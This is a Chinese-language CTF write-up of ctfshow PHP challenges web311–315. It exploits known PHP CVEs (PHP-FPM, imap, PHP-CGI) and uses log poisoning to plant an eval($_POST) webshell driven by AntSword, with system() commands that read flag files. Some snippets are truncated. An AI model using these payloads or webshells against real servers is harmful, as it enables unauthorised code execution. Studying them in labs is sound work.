Web入门_phpCVE
phpCVE
搜索一般都是
php/版本号 cve
或php/版本号 漏洞
¶web311
- 描述: 似曾相识,就这一个文件,不用扫描
抓包发现提示CVE, 以及X-Powered-By: PHP/7.1.33dev
网上搜索, 对应的CVE为CVE-2019-11043
, 再寻找可利用的poc
我找到的poc好多都是基于这个写的, 这个poc需要安装go环境
他甚至给了你一个pdf详细解释这个漏洞
apt install golang |
在URL后加上/index.php/?a=ls
多请求几次, 不是每次都能成功:
可以得到当前目录下fl0gHe1e.txt
, 修改为/index.php/?a=cat%20fl0gHe1e.txt
即可
¶web312
- 描述: 你懂的
抓包得到返回包提示X-Powered-By: PHP/5.6.38
利用该关键词搜索漏洞, 得到: PHP imap远程命令执行漏洞(CVE-2018-19518
)
github_漏洞介绍, 结合这个就可以轻松拿到shell
生成payload:
|
利用payload即可
1=system('tac ctfshowfl4g'); |
¶web313
- 描述: 你懂的
抓包得到返回包提示X-Powered-By: PHP/5.4.1
搜索得到 PHP-CGI远程代码执行CVE-2012-1823
, 测试一下
-c 指定php.ini文件的位置 |
访问/?-s
, 发现确实返回了源码
可以利用远程包含一个木马文件, 这里尝试写个马
# GET: |
结果 Permission denied in php://input, 拉倒了
那就直接执行命令试试, 发现是可以执行的
system("ls"); |
那就找flag, 最后在/somewhere/fla9.txt
中找到, POC:
system("cat /somewhere/fla9.txt"); |
¶web314
- 描述: 严格说算不上cve
|
提示phpinfo, 访问phpinfo.php
, 发现可以包含
过滤冒号, 那就用剩下的包含方式: 日志包含, 利用session.upload_progress文件包含
就用日志包含了:
wappalyzer查看架构, 发现是Nginx服务器, 默认日志文件为/var/log/nginx/access.log
, 尝试访问/?f=/var/log/nginx/access.log
, 发现是可以访问的
在UA头中写入一句话木马, 然后交给蚁剑
eval($_POST[1]) @ |
最后在根目录下的fl6g得到flag
所以也可以直接POST传入
1=system('cat /fl6g'); |
¶web315
- 描述: debug开启,端口9000
那就是纯纯的脚本小子, 这里面也有相关使用方法, 我不多赘述
再贴一个看不太懂的文章: https://blog.csdn.net/weixin_33277215/article/details/116468944